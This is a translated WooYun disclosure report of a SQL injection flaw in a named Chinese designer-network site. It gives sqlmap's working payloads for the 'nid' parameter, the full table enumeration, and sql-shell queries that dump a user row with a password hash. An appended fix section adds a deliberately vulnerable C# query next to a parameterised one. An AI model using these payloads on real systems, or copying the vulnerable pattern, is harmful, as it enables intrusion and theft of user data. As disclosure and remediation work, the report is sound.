
Vulnerability summary

Defect ID: wooyun-2015-0127446

Title: SQL injection vulnerability in China Architecture and Interior Designer Network (information on 720,000 designers and design companies leaked)

Vendor: cncert National Internet Emergency Center

Author: 安全小飞侠

Submitted: 2015-07-19 17:28

Fixed: 2015-09-07 08:18

Published: 2015-09-07 08:18

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: handed over to a third-party partner organization (cncert National Internet Emergency Center) for handling

Source: http://www.wooyun.org. For questions or help, contact [email protected]


Vulnerability details

Disclosure status:

2015-07-19: Details sent to the vendor, awaiting vendor handling
2015-07-24: Vendor confirmed; details disclosed to the vendor only
2015-08-03: Details disclosed to core white hats and experts in the relevant field
2015-08-13: Details disclosed to regular white hats
2015-08-23: Details disclosed to intern white hats
2015-09-07: Details disclosed to the public

Brief description:

SQL injection vulnerability in China Architecture and Interior Designer Network (information on 720,000 designers and design companies leaked)
Please call me 安全小飞侠, thanks!

Detailed description:

http://www.china-designer.com/sub/newsdetail.aspx?cat=3&nid=2013112214135454
Injection parameter: nid


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.china-designer.com:80/sub/newsdetail.aspx?cat=3&nid=2013112214135454' AND 5946=5946 AND 'Zjkt'='Zjkt
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: http://www.china-designer.com:80/sub/newsdetail.aspx?cat=3&nid=2013112214135454' AND 7918=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (7918=7918) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(113))) AND 'COtK'='COtK
---
[21:42:30] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
Database: gbchina
+------------------------------------+---------+
| Table | Entries |
+------------------------------------+---------+
| dbo.syncobj_0x3036394144373334 | 7167971 |
| dbo.syncobj_0x3544303444463639 | 7167971 |
| dbo.t_keywordsrelation | 7167971 |
| dbo.Dynamic | 6033201 |
| dbo.home_index | 3598944 |
| dbo.syncobj_0x3541433545363235 | 3598944 |
| dbo.syncobj_0x4245394639384436 | 3598944 |
| dbo.Ad_IpCount | 2872632 |
| dbo.syncobj_0x3635363730383238 | 2872632 |
| dbo.jf_list | 2285673 |
| dbo.search_pic | 1992307 |
| dbo.t_Pic | 1838899 |
| dbo.syncobj_0x3234453530314435 | 1820193 |
| dbo.syncobj_0x4430463535453143 | 1820193 |
| dbo.t_Where | 1820193 |
| dbo.Old_TypeValue | 1742989 |
| dbo.search_pic_2 | 1731301 |
| dbo.t_PersonalGuestBook | 1422191 |
| dbo.home_guest | 1385997 |
| dbo.t_hotkeywords | 1187513 |
| dbo.App_statistic | 1170699 |
| dbo.t_Mail | 981350 |
| dbo.ex_project_picture | 925182 |
| dbo.syncobj_0x3434393246393743 | 738532 |
| dbo.syncobj_0x3535314436423036 | 738532 |
| dbo.t_Message | 738532 |
| dbo.t_User | 724566 |
| dbo.syncobj_0x3032413339314432 | 685576 |
| dbo.syncobj_0x3839373536453732 | 685576 |
| dbo.t_keywords | 685576 |
| dbo.syncobj_0x4133453043393238 | 681537 |
| dbo.syncobj_0x4241373034334442 | 681537 |
| dbo.t_Apply | 681537 |
| dbo.Dynamic_v2 | 559426 |
| dbo.syncobj_0x4138333332434145 | 522015 |
| dbo.syncobj_0x4142373939333238 | 522015 |
| dbo.t_searchrelation | 522015 |
| dbo.Error | 519745 |
| dbo.SMSLog | 504470 |
| dbo.t_Character | 494174 |
| dbo.syncobj_0x3838463843303546 | 393211 |
| dbo.syncobj_0x4135373230394138 | 393211 |
| dbo.t_Online | 393211 |
| dbo.t_photo | 341263 |
| dbo.search_designer | 336837 |
| dbo.jt_avoterecord | 334579 |
| dbo.index_designer | 289677 |
| dbo.mobile_Validate | 279284 |
| dbo.ex_project | 256579 |
| dbo.search_pic_3 | 226442 |
| dbo.tbCompetition_project_picture | 199686 |
| dbo.jf_integraph | 197832 |
| dbo.blog | 190438 |
| dbo.email_Validate | 166649 |
| dbo.qt_avoterecord | 115284 |
| dbo.search_pic_4 | 99753 |
| dbo.syncobj_0x3731363044463734 | 93312 |
| dbo.syncobj_0x4441363832343030 | 93312 |
| dbo.t_pic_class | 93312 |
| dbo.syncobj_0x3433304239343834 | 88422 |
| dbo.syncobj_0x3945304633363938 | 88422 |
| dbo.t_fav | 88422 |
| dbo.pic_view | 55868 |
| dbo.syncobj_0x3636353541383141 | 55868 |
| dbo.syncobj_0x4544443544363345 | 55868 |
| dbo.Del_statistics | 51937 |
| dbo.IF_LoginRecord | 47924 |
| dbo.ex_comment | 41962 |
| dbo.syncobj_0x3131433341303545 | 41962 |
| dbo.syncobj_0x4131463542423438 | 41962 |
| dbo.blog_Comment | 36914 |
| dbo.syncobj_0x4643303239304439 | 36914 |
| dbo.syncobj_0x3432324636414143 | 27370 |
| dbo.syncobj_0x4536454342344534 | 27370 |
| dbo.t_dns | 27370 |
| dbo.syncobj_0x3532434341423445 | 24745 |
| dbo.syncobj_0x3934303441353239 | 24745 |
| dbo.t_favproject | 24745 |
| dbo.t_owner_project | 22304 |
| dbo.syncobj_0x3846453633373045 | 21622 |
| dbo.syncobj_0x4439363544313744 | 21622 |
| dbo.t_Fav_Product | 21622 |
| dbo.jobinfo | 18119 |
| dbo.T_View_Contact_Log | 17855 |
| dbo.T_View_Contact_Num | 16499 |
| dbo.bidfor | 15432 |
| dbo.blogorg_news | 14840 |
| dbo.syncobj_0x3638393838313832 | 13477 |
| dbo.syncobj_0x4139304530393935 | 13477 |
| dbo.t_owner_answer | 13477 |
| dbo.tbCompetitionReg | 12993 |
| dbo.tbCompetition_project | 12142 |
| dbo.qt_avote | 11240 |
| dbo.search_ownerproject | 10648 |
| dbo.jobinfo_company | 10327 |
| dbo.ds_reg | 9945 |
| dbo.ctf_Apply | 9864 |
| dbo.syncobj_0x3334303943434344 | 9864 |
| dbo.syncobj_0x4634343138423543 | 9864 |
| dbo.t_Material_keywordsrelation | 9235 |
| dbo.syncobj_0x3330333631394332 | 8698 |
| dbo.syncobj_0x3333344242443831 | 8698 |
| dbo.vote_Votes | 8698 |
| dbo.jt_Rating | 7430 |
| dbo.ht_User | 6760 |
| dbo.t_owner_Project_Designer | 5744 |
| dbo.syncobj_0x3134413936313632 | 5500 |
| dbo.syncobj_0x3735314638414642 | 5500 |
| dbo.t_owner_projectpic | 5500 |
| dbo.jt_project | 4983 |
| dbo.qt_Student_Integraph | 3611 |
| dbo.accident | 3356 |
| dbo.syncobj_0x4635353444344139 | 3356 |
| dbo.tbTempPassWordLog | 3242 |
| dbo.jt_reg | 3241 |
| dbo.ht_Lottery | 3132 |
| dbo.jf_game | 3023 |
| dbo.t_School | 2969 |
| dbo.qt_ajury | 2776 |
| dbo.syncobj_0x3031413333373637 | 2546 |
| dbo.syncobj_0x3531463132343431 | 2546 |
| dbo.t_owner_ask | 2546 |
| dbo.tb_App_Client_Log | 2519 |
| dbo.search_ownerQuestion | 2506 |
| dbo.T_Expertise | 2372 |
| dbo.syncobj_0x3035443135444233 | 2349 |
| dbo.syncobj_0x3742393934343432 | 2349 |
| dbo.t_friend_class | 2349 |
| dbo.philips_Case | 2308 |
| dbo.applyvip | 2286 |
| dbo.syncobj_0x4142303930454531 | 2286 |
| dbo.syncobj_0x4138313046323233 | 2023 |
| dbo.syncobj_0x4246363536333544 | 2023 |
| dbo.t_favpic_class | 2023 |
| dbo.tongbupan | 1986 |
| dbo.T_Business_Area | 1875 |
| dbo.qt_jifen | 1834 |
| dbo.qt_Practice | 1823 |
| dbo.cdlyan | 1716 |
| dbo.table_ClassicsCase | 1704 |
| dbo.SBH_Select | 1658 |
| dbo.IF_SkipRecord | 1531 |
| dbo.sub_News | 1428 |
| dbo.cdvote | 1385 |
| dbo.tb_SMSCount_Detail | 1199 |
| dbo.blog_comment_reply | 1153 |
| dbo.syncobj_0x3135383135384230 | 1153 |
| dbo.syncobj_0x3844383837364141 | 1153 |
| dbo.T_Business_Contact | 1058 |
| dbo.ADItems | 993 |
| dbo.t_Material_keywords | 942 |
| dbo.T_Last_View_Time_Owner | 907 |
| dbo.rz100_project | 846 |
| dbo.syncobj_0x3046324634413831 | 846 |
| dbo.syncobj_0x3143374132313745 | 846 |
| dbo.t_favproject_class | 846 |
| dbo.tb_App_Favorite | 825 |
| dbo.Ad_Count | 810 |
| dbo.syncobj_0x3543364446364333 | 810 |
| dbo.t_News_Calender | 715 |
| dbo.Index_RightAd | 665 |
| dbo.syncobj_0x3941383633393730 | 665 |
| dbo.syncobj_0x4143314245364632 | 665 |
| dbo.vip_smallphoto | 623 |
| dbo.syncobj_0x3346454436324533 | 609 |
| dbo.syncobj_0x3436374537393234 | 609 |
| dbo.t_favproduct_class | 609 |
| dbo.Index_Link | 595 |
| dbo.syncobj_0x3138463739323237 | 595 |
| dbo.syncobj_0x4136363431363143 | 595 |
| dbo.t_Fav_Case | 586 |
| dbo.Contest_Re_Views_Show | 565 |
| dbo.T_Tel_Validate | 509 |
| dbo.T_Tel_ValiDate_Log | 508 |
| dbo.tbDesignerPartyVoteLog | 505 |
| dbo.t_city | 501 |
| dbo.syncobj_0x3535423233383244 | 500 |
| dbo.syncobj_0x4637413930433846 | 500 |
| dbo.TABLE_city | 500 |
| dbo.qt_TSrelation | 445 |
| dbo.App_statistic_login | 442 |
| dbo.rz_reg | 426 |
| dbo.t_user_easyInfo | 425 |
| dbo.Designer_labelbak20120213 | 336 |
| dbo.DesignBillBoard_Judge | 327 |
| dbo.t_user_OpenAppList | 308 |
| dbo.jt_Finalist_excellent_Score | 296 |
| dbo.Designer_label | 293 |
| dbo.SBH_News | 291 |
| dbo.Contest_Winning_Projects_List | 277 |
| dbo.syncobj_0x3632304432343832 | 257 |
| dbo.syncobj_0x4337444632383937 | 257 |
| dbo.t_systemmail | 257 |
| dbo.DesignBillBoard_Organ | 255 |
| dbo.Index_ImgHotNew | 239 |
| dbo.syncobj_0x3930333444303341 | 239 |
| dbo.syncobj_0x4631333136413043 | 239 |
| dbo.t_User_Identification_Photo | 209 |
| dbo.AdBasicData | 193 |
| dbo.tb_App_Photo | 193 |
| dbo.SouFun_Index | 190 |
| dbo.syncobj_0x3445423939313142 | 190 |
| dbo.syncobj_0x4242373733303437 | 190 |
| dbo.philips_User | 182 |
| dbo.jt_admin | 171 |
| dbo.ctf_Address | 164 |
| dbo.syncobj_0x3544384539433042 | 164 |
| dbo.syncobj_0x3639353645383542 | 164 |
| dbo.gmz_Designer | 162 |
| dbo.Index_Company | 160 |
| dbo.hfl_baoming | 141 |
| dbo.jt_Nominate | 138 |
| dbo.Sub_PicNews | 136 |
| dbo.HelpLayer | 115 |
| dbo.sub_pinpaisj | 111 |
| dbo.t_user_temp | 111 |
| dbo.Index_LOGO | 97 |
| dbo.syncobj_0x3938344334443643 | 97 |
| dbo.syncobj_0x4333333444443136 | 97 |
| dbo.qt_anews | 93 |
| dbo.Contest_Companies_Intention | 81 |
| dbo.philips_Article | 80 |
| dbo.philips_DownLoad | 73 |
| dbo.Contest_Provide_Jobs_Companies | 72 |
| dbo.syncobj_0x3444373136344343 | 68 |
| dbo.syncobj_0x3946303537433343 | 68 |
| dbo.Work | 68 |
| dbo.tb_App_PollOption | 65 |
| dbo.t_Fav_Case_Class | 64 |
| dbo.Index_NetCase | 63 |
| dbo.jt_Type | 60 |
| dbo.px_module | 60 |
| dbo.tb_App_Topic | 59 |
| dbo.Index_HotNew | 56 |
| dbo.syncobj_0x4230383245313446 | 56 |
| dbo.syncobj_0x4544424346303744 | 56 |
| dbo.RePassWord_Validate | 53 |
| dbo.SBH_sjzl | 53 |
| dbo.home_style | 51 |
| dbo.syncobj_0x3642464642343143 | 51 |
| dbo.syncobj_0x4142353135433642 | 51 |
| dbo.syncobj_0x4244413446434633 | 51 |
| dbo.syncobj_0x4433374335323042 | 51 |
| dbo.vote_Options | 51 |
| dbo.jt_AdminManage | 50 |
| dbo.px_pic | 48 |
| dbo.t_User_Err_List | 48 |
| dbo.DesignBillBoard_Flow | 46 |
| dbo.qt_Student_Contest_Winners_log | 45 |
| dbo.SBH_LinkAndOrg | 44 |
| dbo.tbSubSite | 41 |
| dbo.home_style_bak | 40 |
| dbo.zhuanti_vote | 40 |
| dbo.tb_App_Comment | 39 |
| dbo.ctf_Teacher | 38 |
| dbo.sub_admin | 38 |
| dbo.syncobj_0x3231343633344434 | 38 |
| dbo.syncobj_0x4538334130374631 | 38 |
| dbo.sjz_show | 36 |
| dbo.syncobj_0x3137423536383539 | 36 |
| dbo.syncobj_0x3946374131363844 | 36 |
| dbo.t_Location | 36 |
| dbo.syncobj_0x4236334336444443 | 35 |
| dbo.syncobj_0x4443453732434439 | 35 |
| dbo.tt_Location | 35 |
| dbo.Index_DesignShow | 33 |
| dbo.syncobj_0x3643353431313032 | 33 |
| dbo.syncobj_0x4635384541364536 | 33 |
| dbo.sub_yunyingjigou | 30 |
| dbo.philips_Design | 29 |
| dbo.tbCompetition | 27 |
| dbo.Designer_label_Typebak2012013 | 26 |
| dbo.Designer_label_Type | 25 |
| dbo.Contest_Awards | 24 |
| dbo.tbGetCalendar | 24 |
| dbo.blog_Category | 23 |
| dbo.SouFun_Index_Img | 23 |
| dbo.syncobj_0x3338414535363437 | 23 |
| dbo.syncobj_0x3430434341413342 | 23 |
| dbo.hfl_project | 22 |
| dbo.tb_App_Project_Index | 22 |
| dbo.Index_Book | 21 |
| dbo.syncobj_0x3439373831353438 | 21 |
| dbo.syncobj_0x3641364341353544 | 21 |
| dbo.App_AD | 20 |
| dbo.blog_rec_author | 19 |
| dbo.Index_AdType | 19 |
| dbo.syncobj_0x3532443735364142 | 19 |
| dbo.syncobj_0x3537454232434146 | 19 |
| dbo.syncobj_0x3631334544323839 | 19 |
| dbo.syncobj_0x3832423432384545 | 19 |
| dbo.syncobj_0x3937344646423442 | 19 |
| dbo.syncobj_0x4241423443353936 | 19 |
| dbo.syncobj_0x4246313243323443 | 19 |
| dbo.syncobj_0x4642304535373342 | 19 |
| dbo.t_Count | 19 |
| dbo.t_owner_Project_Pic | 19 |
| dbo.t_pic_type | 19 |
| dbo.v_tuijian_ZL | 19 |
| dbo.Index_Region | 18 |
| dbo.tb_App_Like | 18 |
| dbo.blogorg_Category | 16 |
| dbo.tbTempPassWord | 16 |
| dbo.DesignBillBoard_News | 13 |
| dbo.home_module | 13 |
| dbo.syncobj_0x3037463641324346 | 13 |
| dbo.syncobj_0x3933454230353246 | 13 |
| dbo.philips_imgnews | 12 |
| dbo.t_remark | 12 |
| dbo.t_user_PassWord_Back_log | 12 |
| dbo.ctf_smallClass | 11 |
| dbo.syncobj_0x3237373741303233 | 11 |
| dbo.syncobj_0x3834393332333241 | 11 |
| dbo.tbDesignerPartyVote | 11 |
| dbo.SBH_NewsClass | 10 |
| dbo.syncobj_0x3732313730433746 | 10 |
| dbo.syncobj_0x3738454346433644 | 10 |
| dbo.t_zhitou | 10 |
| dbo.tb_App_PollStatis | 10 |
| dbo.DesignBillBoard | 9 |
| dbo.Manage_user | 9 |
| dbo.syncobj_0x3731364635413039 | 9 |
| dbo.syncobj_0x4134373732304136 | 9 |
| dbo.t_User_App_Admin_RoleID | 9 |
| dbo.DesignBillBorad_Award | 8 |
| dbo.Home_Format | 8 |
| dbo.RePassWord_Other | 8 |
| dbo.syncobj_0x3030334130424142 | 8 |
| dbo.syncobj_0x3736373231383442 | 8 |
| dbo.syncobj_0x4336374439463334 | 8 |
| dbo.syncobj_0x4443453443323634 | 8 |
| dbo.tb_App_Bookmark | 8 |
| dbo.tt_Job | 8 |
| dbo.jt_Books | 7 |
| dbo.px_lesson | 7 |
| dbo.syncobj_0x4142414544343444 | 7 |
| dbo.syncobj_0x4339453037363530 | 7 |
| dbo.tb_App_Invite | 7 |
| dbo.vote_Info | 7 |
| dbo.philips_arctype | 6 |
| dbo.t_user_PassWord_Back | 6 |
| dbo.UploadFielConfig | 6 |
| dbo.Activity_MemClass | 5 |
| dbo.philips_guest | 5 |
| dbo.t_user_Err | 5 |
| dbo.ADAdmin | 4 |
| dbo.ctf_bigClass | 4 |
| dbo.philips_DownType | 4 |
| dbo.syncobj_0x3741373537423345 | 4 |
| dbo.syncobj_0x4336443739304436 | 4 |
| dbo.T_Last_view_time | 4 |
| dbo.t_User_App_Admin | 4 |
| dbo.Activity_intent | 3 |
| dbo.ctf_admin | 3 |
| dbo.Index_News | 3 |
| dbo.qt_action | 3 |
| dbo.SBH_AdminUser | 3 |
| dbo.syncobj_0x3136413235434336 | 3 |
| dbo.syncobj_0x3246313345353533 | 3 |
| dbo.syncobj_0x3446393732364436 | 3 |
| dbo.syncobj_0x3838364133413346 | 3 |
| dbo.t_User_App_Admin_Account | 3 |
| dbo.t_user_App_Admin_Other | 3 |
| dbo.t_User_App_Role | 3 |
| dbo.tbEasySelectionRecommend | 3 |
| dbo.sub_NewsClass | 2 |
| dbo.tb_App_Entrust | 2 |
| dbo.tb_SMSCount | 2 |
| dbo.WeiBoType | 2 |
| dbo.Activity_mess | 1 |
| dbo.jt_Order | 1 |
| dbo.jt_Order_Items | 1 |
| dbo.philips_cnm | 1 |
| dbo.syncobj_0x3444323736353441 | 1 |
| dbo.syncobj_0x4145454530373342 | 1 |
| dbo.t_dirtystr | 1 |
| dbo.tb_App_Entrust_RE | 1 |
+------------------------------------+---------+


[21:42:30] [INFO] calling Microsoft SQL Server shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select count(*) from t_user
[21:43:00] [INFO] fetching SQL SELECT statement query output: 'select count(*) from t_user'
[21:43:00] [INFO] retrieved: 724594
select count(*) from t_user: '724594'


To confirm whether this table is the designer table, I registered an account with the email wooyun@126.com; the test result shows that this table is indeed the site's member table.

select * from t_user where email='wooyun@126.com' [1]:
[*] 1084743, wooyuntest, , wooyun@126.com, 0, , 0, 1, 0, 0, 0, 5648606D4E189B25, , 07 17 2015  8:33PM, , , , 0, 0, 0, 1, 0, 0, 0, 1, 0, , 01  1 1900 12:00AM, 0, 0, 0, 1, , 01  1 1900 12:00AM, 0, 0,


捕获.JPG



Remediation:

You know what to do.
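The remediation the author leaves unstated is, for an ASP.NET page that looks up a news item by a request parameter such as nid on SQL Server, to stop building the SQL text from the parameter and instead validate its shape and bind it as a typed parameter. The following is an added example written for this page, not code from china-designer.com or from WooYun; the class and method names, the connection string, and the News table with its NewsId, Title and Body columns are assumptions for illustration. It shows the injectable concatenation pattern that produces exactly the behaviour sqlmap detected on nid, next to the hardened version.

```csharp
// Added example, not code from the reported site. Table and column names
// (News, NewsId, Title, Body) and the connection string are assumptions.
using System;
using System.Data;
using System.Data.SqlClient;

public static class NewsDetailQueries
{
    // VULNERABLE: the request parameter is spliced into the SQL text, so a
    // value like  2013112214135454' AND 5946=5946 AND 'Zjkt'='Zjkt  becomes
    // part of the WHERE clause. This is the pattern sqlmap detected on nid:
    // a true/false condition changes the page (boolean-based blind), and a
    // failing CONVERT(INT, ...) surfaces data in the error text (error-based).
    public static DataTable GetNewsVulnerable(string connectionString, string nid)
    {
        string sql = "SELECT NewsId, Title, Body FROM News WHERE NewsId = '" + nid + "'";
        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            var table = new DataTable();
            conn.Open();
            table.Load(cmd.ExecuteReader());
            return table;
        }
    }

    // HARDENED: check the shape of nid first, then bind it as a typed
    // parameter. The value is never parsed as SQL, so quotes and AND clauses
    // are just data that matches no row.
    public static DataTable GetNewsSafe(string connectionString, string nid)
    {
        // nid in the reported URL is a plain integer, so anything else is
        // rejected before the database is touched (fail closed).
        if (!long.TryParse(nid, out long newsId) || newsId <= 0)
            throw new ArgumentException("nid must be a positive integer", nameof(nid));

        const string sql = "SELECT NewsId, Title, Body FROM News WHERE NewsId = @NewsId";
        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@NewsId", SqlDbType.BigInt).Value = newsId;
            var table = new DataTable();
            conn.Open();
            table.Load(cmd.ExecuteReader());
            return table;
        }
    }
}
```

Two further points follow from the output above. The error-based technique only works because SQL Server error text reaches the client, so the site should serve a generic error page (in ASP.NET, customErrors with mode="On" or "RemoteOnly" in web.config) and log the detail server-side instead. And the fact that one public news page could enumerate every table in gbchina, including dbo.Manage_user and dbo.tbTempPassWord, means the database login used by the web application had far more than the read access that page needs; a login scoped to the tables each application actually uses limits what any single injection can reach.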

Copyright notice: when reposting, please credit the source 安全小飞侠@乌云


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-07-24 08:17

Vendor reply:

No direct handling channel with the website's operating organization has been established yet; attempting to notify the website's domain owner by email.

Latest status:

None yet

